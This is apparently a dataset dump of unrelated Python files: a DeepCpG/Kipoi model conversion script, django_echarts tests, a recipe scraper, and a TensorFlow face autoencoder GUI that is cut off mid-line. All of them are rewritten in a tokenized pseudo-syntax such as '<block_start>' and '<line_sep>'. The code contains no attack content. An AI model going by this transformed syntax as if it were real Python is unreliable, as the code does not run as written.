content
stringlengths 0
1.55M
|
---|
"""
This file is skipped during normal test because the file name is not started with benchmarks
"""<import_stmt>os<import_from_stmt>.. read_sql<def_stmt>read_sql_impl conn:str table:str<block_start>read_sql(conn f"""SELECT * FROM {table}""" partition_on="L_ORDERKEY" partition_num=10 )<block_end><def_stmt>bench_mysql benchmark<block_start>benchmark(read_sql_impl os.environ["MYSQL_URL"] os.environ["TPCH_TABLE"])<block_end><def_stmt>bench_postgres benchmark<block_start>benchmark(read_sql_impl os.environ["POSTGRES_URL"] os.environ["TPCH_TABLE"])<block_end>
|
"""The horizon component."""<line_sep>
|
<import_stmt>yaml<import_stmt>keras<import_stmt>json<import_stmt>shutil<import_stmt>os<import_from_stmt>deepcpg.utils make_dir to_list<import_from_stmt>deepcpg.models.utils decode_replicate_names encode_replicate_names get_sample_weights<line_sep>##### This function is needed to extract info on model architecture so that the output can be generated correctly.
<def_stmt>data_reader_config_from_model model config_out_fpath=<none> replicate_names=<none><block_start>"""Return :class:`DataReader` from `model`.
Builds a :class:`DataReader` for reading data for `model`.
Parameters
----------
model: :class:`Model`.
:class:`Model`.
outputs: bool
If `True`, return output labels.
replicate_names: list
Name of input cells of `model`.
Returns
-------
:class:`DataReader`
Instance of :class:`DataReader`.
"""<line_sep>use_dna=<false><line_sep>dna_wlen=<none><line_sep>cpg_wlen=<none><line_sep>output_names=<none><line_sep>encode_replicates=<false><line_sep>#
input_shapes=to_list(model.input_shape)<for_stmt>input_name,input_shape zip(model.input_names input_shapes)<block_start><if_stmt>input_name<eq>'dna'# Read DNA sequences.
<block_start>use_dna=<true><line_sep>dna_wlen=input_shape[1]<block_end><elif_stmt>input_name.startswith('cpg/state/')# DEPRECATED: legacy model. Decode replicate names from input name.
<block_start>replicate_names=decode_replicate_names(input_name.replace('cpg/state/' ''))<assert_stmt>len(replicate_names)<eq>input_shape[1]<line_sep>cpg_wlen=input_shape[2]<line_sep>encode_replicates=<true><block_end><elif_stmt>input_name<eq>'cpg/state'# Read neighboring CpG sites.
<block_start><if_stmt><not>replicate_names<block_start><raise>ValueError('Replicate names required!')<block_end><if_stmt>len(replicate_names)<ne>input_shape[1]<block_start>tmp='{r} replicates found but CpG model was trained with'<concat>' {s} replicates. Use `--nb_replicate {s}` or '<concat>' `--replicate_names` option to select {s} replicates!'<line_sep>tmp=tmp.format(r=len(replicate_names) s=input_shape[1])<line_sep><raise>ValueError(tmp)<block_end>cpg_wlen=input_shape[2]<block_end><block_end>output_names=model.output_names<line_sep>config={"output_names":output_names "use_dna":use_dna "dna_wlen":dna_wlen "cpg_wlen":cpg_wlen "replicate_names":replicate_names "encode_replicates":encode_replicates}<if_stmt>config_out_fpath<is><not><none><block_start><with_stmt>open(config_out_fpath "w")<as>ofh<block_start>json.dump(config ofh)<block_end><block_end><return>config<block_end><def_stmt>make_model_yaml template_yaml model_json output_yaml_path#
<block_start><with_stmt>open(template_yaml 'r')<as>f<block_start>model_yaml=yaml.load(f)<block_end>#
# get the model config:
json_file=open(model_json 'r')<line_sep>loaded_model_json=json_file.read()<line_sep>json_file.close()<line_sep>loaded_model=keras.models.model_from_json(loaded_model_json)<line_sep>#
model_yaml["schema"]["targets"]=[]<for_stmt>oname,oshape zip(loaded_model.output_names loaded_model.output_shape)<block_start>append_el={"name":oname "shape":str(oshape)#replace("None,", "")
"doc":"Methylation probability for %s"%oname}<line_sep>model_yaml["schema"]["targets"].append(append_el)<block_end>#
<with_stmt>open(output_yaml_path 'w')<as>f<block_start>yaml.dump(model_yaml f default_flow_style=<false>)<block_end><block_end><def_stmt>make_secondary_dl_yaml template_yaml model_json output_yaml_path<block_start><with_stmt>open(template_yaml 'r')<as>f<block_start>model_yaml=yaml.load(f)<block_end>#
# get the model config:
json_file=open(model_json 'r')<line_sep>loaded_model_json=json_file.read()<line_sep>json_file.close()<line_sep>loaded_model=keras.models.model_from_json(loaded_model_json)<line_sep>#
model_yaml["output_schema"]["targets"]=[]<for_stmt>oname,oshape zip(loaded_model.output_names loaded_model.output_shape)<block_start>append_el={"name":oname "shape":str(oshape)#replace("None,", "")
"doc":"Methylation probability for %s"%oname}<line_sep>model_yaml["output_schema"]["targets"].append(append_el)<block_end>#
<with_stmt>open(output_yaml_path 'w')<as>f<block_start>yaml.dump(model_yaml f default_flow_style=<false>)<block_end><block_end><import_stmt>errno<def_stmt>symlink_force target link_name<block_start><try_stmt><block_start>os.symlink(target link_name)<block_end><except_stmt>OSError<as>e<block_start><if_stmt>e.errno<eq>errno.EEXIST<block_start>os.remove(link_name)<line_sep>os.symlink(target link_name)<block_end><else_stmt><block_start><raise>e<block_end><block_end><block_end><def_stmt>softlink_files bpath model_name<block_start>print("Softlinking: {0}".format(model_name))<line_sep>symlink_force(bpath+"template/dataloader.yaml" bpath+"{0}/dataloader.yaml".format(model_name))<line_sep>#symlink_force("../template/model.yaml","{0}/model.yaml".format(model_name))
symlink_force(bpath+"template/dataloader.py" bpath+"{0}/dataloader.py".format(model_name))<line_sep>symlink_force(bpath+"template/example_files" bpath+"{0}/example_files".format(model_name))<block_end># prepare DeepCpG
deepcpg_bdir="/nfs/research2/stegle/users/rkreuzhu/deepcpg/deepcpg-1.0.4/scripts/"<line_sep>output_dir="/nfs/research2/stegle/users/rkreuzhu/kipoi_models_fork/models/DeepCpG"<line_sep>models=["Hou2016_HepG2_dna" "Hou2016_HCC_dna" "Hou2016_mESC_dna" "Smallwood2014_serum_dna" "Smallwood2014_2i_dna"]<for_stmt>model models<block_start>in_dir=os.path.join(deepcpg_bdir model)<line_sep>out_dir=os.path.join(output_dir model)<line_sep>model_files=os.path.join(out_dir "model_files")<if_stmt><not>os.path.exists(out_dir)<block_start>os.makedirs(out_dir)<block_end><if_stmt><not>os.path.exists(model_files)<block_start>os.makedirs(model_files)<block_end>shutil.copy(os.path.join(in_dir "model.json") model_files)<line_sep>shutil.copy(os.path.join(in_dir "model_weights.h5") model_files)<line_sep>make_model_yaml(os.path.join(output_dir "template" 'model_template.yaml') os.path.join(model_files "model.json") os.path.join(out_dir 'model.yaml'))<line_sep>make_secondary_dl_yaml(os.path.join(output_dir "template" 'dataloader_m_template.yaml') os.path.join(model_files "model.json") os.path.join(out_dir 'dataloader_m.yaml'))<try_stmt><block_start>os.unlink(output_dir+"/"+model+"/dataloader_m.py")<block_end><except_stmt><block_start><pass><block_end>shutil.copy(output_dir+"/"+"template/dataloader_m.py" output_dir+"/"+model)<line_sep>softlink_files(output_dir+"/" model)<line_sep>#
# generate the model config file:
json_file=open(os.path.join(model_files "model.json") 'r')<line_sep>loaded_model_json=json_file.read()<line_sep>json_file.close()<line_sep>loaded_model=keras.models.model_from_json(loaded_model_json)<line_sep>data_reader_config_from_model(loaded_model os.path.join(out_dir 'model_config.json') replicate_names=<none>)<block_end><for_stmt>model models<block_start>out_dir=os.path.join(output_dir model)<if_stmt>os.path.isdir(out_dir)<block_start>command="python /nfs/research2/stegle/users/rkreuzhu/opt/model-zoo/kipoi/__main__.py test %s"%out_dir<line_sep>ret=os.system(command)<assert_stmt>(ret<eq>0)<block_end><block_end>## test with custom dataloader:
<import_stmt>kipoi<line_sep>model=kipoi.get_model(out_dir source="dir")<line_sep>Dl=kipoi.get_dataloader_factory(out_dir+"/dataloader_m.yaml" source="dir")# fails
<import_stmt>os<line_sep>os.chdir(out_dir)<import_stmt>keras<import_stmt>kipoi<import_from_stmt>dataloader *<import_from_stmt>keras.models load_model<import_from_stmt>dataloader_m Dataloader<line_sep>samples=["example_files/BS27_1_SER.tsv" "example_files/BS27_3_SER.tsv" "example_files/BS27_5_SER.tsv" "example_files/BS27_6_SER.tsv" "example_files/BS27_8_SER.tsv"]<line_sep>ref="example_files/mm10"<line_sep>model=kipoi.get_model("./" source="dir")<line_sep>data_loader=Dataloader(samples ref outputs=<true>)<line_sep># the inputs, outputs, weights can then be returned from the dataloader...
ret=data_loader.__next__()<for_stmt>inputs,outputs,weights data_loader<block_start>preds=to_list(model.model.predict(inputs))<block_end>
|
# terrascript/provider/dme.py
<import_stmt>terrascript<class_stmt>dme(terrascript.Provider)<block_start><pass><block_end>__all__=["dme"]<line_sep>
|
# coding=utf8
<import_stmt>unittest<import_from_stmt>django_echarts.datasets.fetch fetch fetch_single ifetch_multiple<line_sep>DICT_LIST_DATA=[{'id':282 'name':'Alice' 'age':30 'sex':'female'} {'id':217 'name':'Bob' 'age':56} {'id':328 'name':'Charlie' 'age':56 'sex':'male'} ]<class_stmt>FetchTestCase(unittest.TestCase)<block_start><def_stmt>test_fetch_single self<block_start>names=fetch_single(DICT_LIST_DATA 'name')<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>sexs=fetch_single(DICT_LIST_DATA 'sex' default='male')<line_sep>self.assertListEqual(sexs ['female' 'male' 'male'])<block_end><def_stmt>test_ifetch_multiple self<block_start>names,ages=map(list ifetch_multiple(DICT_LIST_DATA 'name' 'age'))<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<block_end><def_stmt>test_fetch self<block_start>names=fetch(DICT_LIST_DATA 'name')<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>sexs=fetch(DICT_LIST_DATA 'sex' default='male')<line_sep>self.assertListEqual(sexs ['female' 'male' 'male'])<line_sep>names,ages=fetch(DICT_LIST_DATA 'name' 'age')<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<line_sep>names,ages,sexs=fetch(DICT_LIST_DATA 'name' 'age' 'sex' defaults={'sex':'male'})<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<line_sep>self.assertListEqual(sexs ['female' 'male' 'male'])<block_end><block_end><class_stmt>MockItem<block_start><def_stmt>__init__ self x y z<block_start>self._data={'x':x 'y':y 'z':z}<block_end><def_stmt>get self key<block_start><return>self._data.get(key)<block_end><block_end><class_stmt>FetchCustomGetterTestCase(unittest.TestCase)<block_start><def_stmt>test_custom_getter self<block_start>data_list=[MockItem(1 2 3) MockItem(4 5 6) MockItem(7 8 9)]<line_sep>xs,ys,zs=fetch(data_list 'x' 'y' 'z' getter=<lambda>item key:item.get(key))<line_sep>self.assertListEqual([1 4 7] xs)<block_end><def_stmt>test_with_dict self<block_start>"""
Use dict.get(key) to pick item.
"""<line_sep>names,ages=fetch(DICT_LIST_DATA 'name' 'age' getter=<lambda>item key:item.get(key))<line_sep>self.assertListEqual(names ['Alice' 'Bob' 'Charlie'])<line_sep>self.assertListEqual(ages [30 56 56])<block_end><block_end>
|
<import_from_stmt>bs4 BeautifulSoup<import_from_stmt>._abstract AbstractScraper<import_from_stmt>._utils normalize_string<class_stmt>KingArthur(AbstractScraper)<block_start>@classmethod<def_stmt>host cls<block_start><return>"kingarthurbaking.com"<block_end><def_stmt>title self<block_start><return>self.schema.title()<block_end><def_stmt>total_time self<block_start><return>self.schema.total_time()<block_end><def_stmt>yields self<block_start><return>self.schema.yields()<block_end><def_stmt>image self<block_start><return>self.schema.image()<block_end><def_stmt>ingredients self<block_start><return>self.schema.ingredients()<block_end><def_stmt>instructions self<block_start>"""
King Arthur updated how they format their instructions to include html (instructions wrapped in <p>) in the
`recipeInstructions`, parse the instructions assuming each step is wrapped in a <p> first, and fallback to just
returning the schema instructions in case this is changed, again.
"""<line_sep>schema_instructions=self.schema.instructions()<line_sep>soup=BeautifulSoup(schema_instructions "html.parser")<line_sep>instruction_elms=soup.findAll("p")<if_stmt>instruction_elms<block_start><return>"\n".join([normalize_string(elm.get_text())<for>elm instruction_elms])<block_end><return>schema_instructions<block_end><def_stmt>ratings self<block_start><return>self.schema.ratings()<block_end><block_end>
|
<import_stmt>html<import_stmt>math<import_stmt>pygame<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>pygame.locals *<import_from_stmt>scipy misc<line_sep>eigenvalues=np.load("eigenvalues.npy")<line_sep>eigenvectors=np.load("eigenvectors.npy")<line_sep>eigenvectorInverses=np.linalg.pinv(eigenvectors)<def_stmt>weight_variable shape<block_start>initial=tf.truncated_normal(shape stddev=0.1)<line_sep><return>tf.Variable(initial)<block_end><def_stmt>bias_variable shape<block_start>initial=tf.constant(0.1 shape=shape)<line_sep><return>tf.Variable(initial)<block_end>IMAGE_WIDTH=64<line_sep>IMAGE_HEIGHT=64<line_sep>IMAGE_COUNT=13016<line_sep>DENSE_SIZE=300<line_sep>learning_rate=0.0002# Used to be 0.001
settings=np.zeros((DENSE_SIZE ))<line_sep>approach_settings=np.zeros((2 ))<line_sep>approach_settings.fill(1)<line_sep>denseData=np.load("denseArray27K.npy")<line_sep>shouldICalculateImage=<true><line_sep>f=open('names/allNames.txt' 'r+')<line_sep>allNames=f.read()<line_sep>f.close()<line_sep>allPeople=html.unescape(allNames).split('\n')<line_sep>f=open('eigenvalueNames.txt' 'r+')<line_sep>eigenvalueNames=f.read().split('\n')<line_sep>f.close()<line_sep>nearestPerson=0<line_sep>meanData=denseData.mean(axis=0)<line_sep>inputs_=tf.placeholder(tf.float32 (<none> IMAGE_HEIGHT IMAGE_WIDTH 3) name='inputs')<line_sep>targets_=tf.placeholder(tf.float32 (<none> IMAGE_HEIGHT IMAGE_WIDTH 3) name='targets')<line_sep>""" Encoder """<line_sep>conv0=tf.layers.conv2d(inputs=inputs_ filters=120 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 64x64x25
maxpool0=tf.layers.max_pooling2d(conv0 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 32x32x25
conv1=tf.layers.conv2d(inputs=maxpool0 filters=160 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 32x32x40
maxpool1=tf.layers.max_pooling2d(conv1 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 16x16x40
conv2=tf.layers.conv2d(inputs=maxpool1 filters=200 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 16x16x60
maxpool2=tf.layers.max_pooling2d(conv2 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 8x8x60
conv3=tf.layers.conv2d(inputs=maxpool2 filters=240 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 8x8x80
maxpool3=tf.layers.max_pooling2d(conv3 pool_size=(2 2) strides=(2 2) padding='same')<line_sep># Now 4x4x80
maxpool3_flat=tf.reshape(maxpool3 [-1 4<times>4<times>240])<line_sep>W_fc1=weight_variable([4<times>4<times>240 300])<line_sep>b_fc1=bias_variable([300])<line_sep>tesy=tf.matmul(maxpool3_flat W_fc1)<line_sep>encoded=tf.nn.relu(tf.matmul(maxpool3_flat W_fc1)+b_fc1)<line_sep>W_fc2=weight_variable([300 4<times>4<times>240])<line_sep>b_fc2=bias_variable([4<times>4<times>240])<line_sep>predecoded_flat=tf.nn.relu(tf.matmul(encoded W_fc2)+b_fc2)<line_sep>predecoded=tf.reshape(predecoded_flat [-1 4 4 240])<line_sep>""" Decoder """<line_sep>upsample1=tf.image.resize_images(predecoded size=(8 8) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 8x8x80
conv4=tf.layers.conv2d(inputs=upsample1 filters=200 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 8x8x60
upsample2=tf.image.resize_images(conv4 size=(16 16) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 16x16x60
conv5=tf.layers.conv2d(inputs=upsample2 filters=160 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 16x16x40
upsample3=tf.image.resize_images(conv5 size=(32 32) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 32x32x40
conv6=tf.layers.conv2d(inputs=upsample3 filters=120 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 32x32x25
upsample4=tf.image.resize_images(conv6 size=(64 64) method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)<line_sep># Now 64x64x25
conv7=tf.layers.conv2d(inputs=upsample4 filters=15 kernel_size=(3 3) padding='same' activation=tf.nn.relu)<line_sep># Now 64x64x10
logits=tf.layers.conv2d(inputs=conv7 filters=3 kernel_size=(3 3) padding='same' activation=<none>)<line_sep># Now 64x64x1
# Pass logits through sigmoid to get reconstructed image
decoded=tf.nn.sigmoid(logits)<line_sep># Pass logits through sigmoid and calculate the cross-entropy loss
loss=tf.nn.sigmoid_cross_entropy_with_logits(labels=targets_ logits=logits)<line_sep># Get cost and define the optimizer
cost=tf.reduce_mean(loss)<line_sep>opt=tf.train.AdamOptimizer(learning_rate).minimize(cost)<line_sep>sess=tf.Session()<line_sep>saver=tf.train.Saver()<line_sep>sess.run(tf.global_variables_initializer())<line_sep>saver.restore(sess "models/model27674.ckpt")<def_stmt>get_celeb_sliders i<block_start>traits=denseData[i]-meanData<line_sep><return>np.matmul(traits eigenvectorInverses)/eigenvalues<block_end>celebSliders=np.zeros(denseData.shape)<for_stmt>i range(denseData.shape[0])<block_start>celebSliders[i]=get_celeb_sliders(i)<block_end><def_stmt>calculate_image settings<block_start>real_settings=meanData.copy()<for_stmt>i range(DENSE_SIZE)<block_start>real_settings<augadd>settings[i]<times>eigenvalues[i]<times>eigenvectors[i]<block_end>real_settings=real_settings.reshape((1 DENSE_SIZE))<line_sep>reconstructed_image=sess.run([decoded] feed_dict={encoded:real_settings})<line_sep>ri_np=np.array(reconstructed_image).reshape((64 64 3))<line_sep>ri_np=np.swapaxes(ri_np 0 1)<line_sep>closest_celeb=np.argmin(np.linalg.norm((settings-celebSliders)<times>eigenvalues axis=1))<line_sep><return>ri_np<times>255 closest_celeb<block_end><def_stmt>create_special_children index parent_count file_name<block_start>total_image=np.zeros((240+264<times>parent_count 300 3))<line_sep>total_image.fill(255)<line_sep>parents=[-1]<times>parent_count<line_sep>child_settings=np.zeros((celebSliders[0].shape ))<for_stmt>i range(0 parent_count)<block_start><while_stmt>parents[i]<eq>-1<or>int(allPeople[parents[i]].split(",")[1])<g>10# fame rank must be 5 or better
<block_start>parents[i]=np.random.randint(IMAGE_COUNT)<block_end>parents[i]=13015<line_sep>child_settings<augadd>celebSliders[parents[i]]<block_end>child_settings<augdiv>parent_count<for_stmt>i range(0 parent_count+1)<block_start><if_stmt>i<eq>parent_count<block_start>img,_=calculate_image(child_settings)<block_end><else_stmt><block_start>img,_=calculate_image(celebSliders[parents[i]])<line_sep># img = np.swapaxes(misc.imread("data/dataFace"+str(parents[i])+".png"),0,1)
<block_end>total_image[24+i<times>264:216+i<times>264 24:216]=misc.imresize(img size=[192 192] interp='nearest')<block_end>blah=pygame.surfarray.make_surface(total_image)<for_stmt>i range(0 parent_count+1)<block_start>name="CHILD"<if_stmt>i<l>parent_count<block_start>name=allPeople[parents[i]].split(",")[0]<block_end>font=pygame.font.SysFont("Helvetica" 22)<line_sep>text_surface=font.render(name 1 (0 0 0))<line_sep>blah.blit(text_surface [24+264<times>i 220])<if_stmt>i<l>parent_count-1<block_start>font=pygame.font.SysFont("Helvetica" 48)<line_sep>blah.blit(font.render('^' 1 (0 0 0)) [240+264<times>i 100])<block_end><block_end>font=pygame.font.SysFont("Helvetica" 48)<line_sep>blah.blit(font.render('=' 1 (0 0 0)) [240+264<times>(parent_count-1) 100])<line_sep>pygame.image.save(blah "spesh/"+file_name+"{:03d}".format(index)+".png")<block_end><def_stmt>create_child_grid index parent_count file_name<block_start>total_image=np.zeros((264+264<times>parent_count 264+264<times>parent_count 3))<line_sep>total_image[264: 264: :]=255<line_sep>parents=[-1]<times>parent_count<for_stmt>i range(0 parent_count)<block_start>parents[i]=np.random.randint(IMAGE_COUNT)<line_sep>img,_=calculate_image(celebSliders[parents[i]])<line_sep># img = np.swapaxes(misc.imread("data/dataFace"+str(parents[i])+".png"),0,1)
big_img=misc.imresize(img size=[192 192] interp='nearest')<line_sep>total_image[24+(i+1)<times>264:216+(i+1)<times>264 24:216]=big_img<line_sep>total_image[24:216 24+(i+1)<times>264:216+(i+1)<times>264]=big_img<line_sep>total_image[264<times>(i+1):264<times>(i+2) 264<times>(i+1):264<times>(i+2)]=[0 255 0]<block_end><for_stmt>i range(0 parent_count)<block_start><for_stmt>j range(0 parent_count)<block_start>child_settings=(celebSliders[parents[i]]+celebSliders[parents[j]])/2<line_sep>img,_=calculate_image(child_settings)<line_sep>total_image[24+(i+1)<times>264:216+(i+1)<times>264 24+(j+1)<times>264:216+(j+1)<times>264]=misc.imresize(img size=[192 192] interp='nearest')<block_end><block_end>blah=pygame.surfarray.make_surface(total_image)<for_stmt>i range(0 parent_count)<block_start>name=allPeople[parents[i]].split(",")[0]<line_sep>font=pygame.font.SysFont("Helvetica" 22)<line_sep>text_surface=font.render(name 1 (255 255 255))<line_sep>blah.blit(text_surface [24+264<times>(i+1) 220])<line_sep>blah.blit(text_surface [24 220+264<times>(i+1)])<block_end>pygame.image.save(blah "spesh/{}{:03d}.png".format(file_name index))<block_end><def_stmt>create_family_tree index parent_count file_name<block_start>total_image=np.zeros((264<times>parent_count 264<times>parent_count 3))<line_sep>total_image.fill(255)<line_sep>parents=[-1]<times>parent_count<line_sep>allSettings=np.zeros((parent_count parent_count celebSliders[0].shape[0]))<for_stmt>i range(0 parent_count)<block_start>parents[i]=np.random.randint(IMAGE_COUNT)<line_sep>allSettings[0 i]=celebSliders[parents[i]]<line_sep>img,_=calculate_image(celebSliders[parents[i]])<line_sep># img = np.swapaxes(misc.imread("data/dataFace"+str(parents[i])+".png"),0,1)
big_img=misc.imresize(img size=[192 192] interp='nearest')<line_sep>total_image[24+i<times>264:216+i<times>264 40:232]=big_img<block_end><for_stmt>level range(1 parent_count)<block_start><for_stmt>i range(0 parent_count-level)<block_start>allSettings[level i]=(allSettings[level-1 i]+allSettings[level-1 i+1])<times>0.5<line_sep>img,_=calculate_image(allSettings[level i])<line_sep>x_start=24+i<times>264+level<times>132<line_sep>y_start=40+level<times>264<line_sep>total_image[x_start:x_start+192 y_start:y_start+192]=misc.imresize(img size=[192 192] interp='nearest')<line_sep>total_image[x_start+92:x_start+100 y_start-32:y_start]=0<line_sep>total_image[x_start:x_start+192 y_start-40:y_start-32]=0<line_sep>total_image[x_start:x_start+8 y_start-72:y_start-40]=0<line_sep>total_image[x_start+184:x_start+192 y_start-72:y_start-40]=0<block_end><block_end>blah=pygame.surfarray.make_surface(total_image)<for_stmt>i range(0 parent_count)<block_start>name=allPeople[parents[i]].split(",")[0]<line_sep>font=pygame.font.SysFont("Helvetica" 22)<line_sep>text_surface=font.render(name 1 (0 0 0))<line_sep>blah.blit(text_surface [20+264<times>i 14])<block_end>pygame.image.save(blah "spesh/{}{:03d}.png".format(file_name index))<block_end>WHITE=(255 255 255)<line_sep>BLACK=(0 0 0)<line_sep>RED=(255 50 50)<line_sep>YELLOW=(255 255 0)<line_sep>GREEN=(0 255 50)<line_sep>BLUE=(50 50 255)<line_sep>GREY=(200 200 200)<line_sep>ORANGE=(200 100 50)<line_sep>CYAN=(0 255 255)<line_sep>MAGENTA=(255 0 255)<line_sep>TRANS=(1 1 1)<line_sep>VISIBLE_COMPONENTS=20<line_sep>enteringName=<false><line_sep>isShiftPressed=<false><line_sep>enteredName=""<line_sep>frameTimer=0<line_sep>misspelledTimer=0<line_sep>scrollPosition=0<line_sep>stringToNameDict={}<line_sep>transitionTimes=np.zeros((2 ))<line_sep>transitionKeyFrames=np.zeros((2 DENSE_SIZE))<for_stmt>i range(len(allPeople))<block_start>line=allPeople[i]<line_sep>pieces=line.split(",")<line_sep>name=pieces[0]<line_sep>alpha_only_name=''.join(x<for>x name<if>(x.isalpha()<or>x<eq>' '))<line_sep>lower_name=alpha_only_name.lower()<if_stmt>len(lower_name)<ge>1<block_start>stringToNameDict[lower_name]=i<block_end><block_end><def_stmt>string_to_celeb st<block_start>alpha_only_name=''.join(x<for>x st<if>(x.isalpha()<or>x<eq>' '))<line_sep>lower_name=alpha_only_name.lower()<if_stmt>lower_name<not><in>stringToNameDict<block_start><return>-1<block_end><return>stringToNameDict[lower_name]<block_end>oops_image=pygame.image.load("oops.png")<line_sep>imagerect=oops_image.get_rect()<line_sep>calculatedImage,nearestPerson=calculate_image(settings)<class_stmt>Slider()<block_start><def_stmt>__init__ self i maxi mini x y w h<block_start>self.maxi=maxi<line_sep>self.mini=mini<line_sep>self.x=x<line_sep>self.y=y<line_sep>self.w=w<line_sep>self.h=h<line_sep>self.surf=pygame.surface.Surface((w h))<line_sep>self.hit=<false><line_sep>self.i=i<line_sep>self.font=pygame.font.SysFont("Helvetica" 16)<block_end><def_stmt>true_i self<block_start><return>self.i+scrollPosition<block_end><def_stmt>draw self<block_start>j=self.true_i()<line_sep>eigen="%.4f"%eigenvalues[j]<line_sep>name="PCA #"+str(self.true_i()+1)+" ("+eigen+")"<if_stmt>j<l>len(eigenvalueNames)-1<block_start>name=eigenvalueNames[j]<block_end>txt_surf=self.font.render(name 1 WHITE)<line_sep>txt_rect=txt_surf.get_rect(center=(self.w/2 13))<line_sep>s=70<if_stmt>self.i%2+(self.i<floordiv>2)%2<eq>1<block_start>s=100<block_end>self.surf.fill((s s s))<line_sep>pygame.draw.rect(self.surf (220 220 220) [10 30 self.w-20 5] 0)<for_stmt>g range(7)<block_start>pygame.draw.rect(self.surf (s+50 s+50 s+50) [9+(self.w-20)/6<times>g 40 2 5] 0)<block_end>self.surf.blit(txt_surf txt_rect)<line_sep>button_surf=pygame.surface.Surface((10 20))<line_sep>button_surf.fill(TRANS)<line_sep>button_surf.set_colorkey(TRANS)<line_sep>pygame.draw.rect(button_surf WHITE [0 0 10 20])<line_sep>surf=self.surf.copy()<line_sep>v=min(max(settings[j] -9999) 9999)<line_sep>pos=(10+int((v-self.mini)/(self.maxi-self.mini)<times>(self.w-20)) 33)<line_sep>button_rect=button_surf.get_rect(center=pos)<line_sep>surf.blit(button_surf button_rect)<line_sep>button_rect.move_ip(self.x self.y)<line_sep>screen.blit(surf (self.x self.y))<block_end><def_stmt>move self<block_start>j=self.true_i()<line_sep>settings[j]=(pygame.mouse.get_pos()[0]-self.x-10)/130<times>(self.maxi-self.mini)+self.mini<if_stmt>settings[j]<l>self.mini<block_start>settings[j]=self.mini<block_end><if_stmt>settings[j]<g>self.maxi<block_start>settings[j]=self.maxi<block_end><block_end><block_end><class_stmt>ApproachSlider()<block_start><def_stmt>__init__ self i maxi mini x y w h<block_start>self.maxi=maxi<line_sep>self.mini=mini<line_sep>self.x=x<line_sep>self.y=y<line_sep>self.w=w<line_sep>self.h=h<line_sep>self.surf=pygame.surface.Surface((w h))<line_sep>self.hit=<false><line_sep>self.i=i<line_sep>self.font=pygame.font.SysFont("Helvetica" 16)<block_end><def_stmt>draw self<block_start><if_stmt>self.i<eq>0<block_start>st="Go "+"%.1f"%(100<times>approach_settings[self.i])+"% the way to this celeb."<block_end><else_stmt><block_start>st="Speed of travel: "+"%.2f"%(100<times>(1-approach_settings[self.i]))+" frames"<block_end>txt_surf=self.font.render(st 1 WHITE)<line_sep>txt_rect=txt_surf.get_rect(center=(self.w/2 13))<line_sep>s=70+30<times>self.i<line_sep>self.surf.fill((s s s))<line_sep>pygame.draw.rect(self.surf (220 220 220) [10 35 self.w-20 5] 0)<line_sep>self.surf.blit(txt_surf txt_rect)<line_sep>button_surf=pygame.surface.Surface((10 30))<line_sep>button_surf.fill(TRANS)<line_sep>button_surf.set_colorkey(TRANS)<line_sep>pygame.draw.rect(button_surf WHITE [0 0 10 30])<line_sep>surf=self.surf.copy()<line_sep>v=min(max(approach_settings[self.i] -9999) 9999)<line_sep>pos=(10+int((v-self.mini)/(self.maxi-self.mini)<times>(self.w-20)) 38)<line_sep>button_rect=button_surf.get_rect(center=pos)<line_sep>surf.blit(button_surf button_rect)<line_sep>button_rect.move_ip(self.x self.y)<line_sep>screen.blit(surf (self.x self.y))<block_end><def_stmt>move self<block_start>approach_settings[self.i]=(pygame.mouse.get_pos()[0]-self.x-10)/(self.w-20)<times>(self.maxi-self.mini)+self.mini<if_stmt>approach_settings[self.i]<l>self.mini<block_start>approach_settings[self.i]=self.mini<block_end><if_stmt>approach_settings[self.i]<g>self.maxi<block_start>approach_settings[self.i]=self.maxi<block_end><block_end><block_end><def_stmt>draw_buttons <block_start>enb_shade=200<if_stmt>enteringName<block_start>enb_shade=math.sin(frameTimer<times>0.06)<times>40+200<block_end>enter_name_button=pygame.surface.Surface((300 120))<line_sep>pygame.draw.rect(enter_name_button (enb_shade enb_shade enb_shade) [5 5 290 110] 0)<line_sep>st="[Enter celeb name]"<if_stmt>len(enteredName)<ge>1<block_start>st=enteredName<block_end>button_data=[[(0 0) (300 60) (230 30 30) 44 "RANDOMIZE" WHITE] [(0 540) (300 60) (30 30 230) 44 "GO TO MEAN" WHITE] [(800 0) (300 120) (230 170 30) 44 "INVERT" WHITE] [(300 500) (500 100) (0 0 0) 24 "Hey! You look like "+allPeople[nearestPerson].split(",")[0]+"." WHITE] [(800 120) (300 120) (enb_shade enb_shade enb_shade) 30 st BLACK] [(800 360) (300 120) (30 170 30) 44 "GO TO THEM" WHITE] [(800 480) (300 120) (30 170 30) 24 "GO TO RANDOM CELEB" WHITE]]<for_stmt>button button_data<block_start>button_surface=pygame.surface.Surface(button[1])<line_sep>pygame.draw.rect(button_surface button[2] [5 5 button[1][0]-10 button[1][1]-10] 0)<line_sep>font=pygame.font.SysFont("Helvetica" button[3])<line_sep>b_text=font.render(button[4] 1 button[5])<line_sep>b_text_rect=b_text.get_rect(center=(button[1][0]/2 button[1][1]/2))<line_sep>button_surface.blit(b_text b_text_rect)<line_sep>screen.blit(button_surface 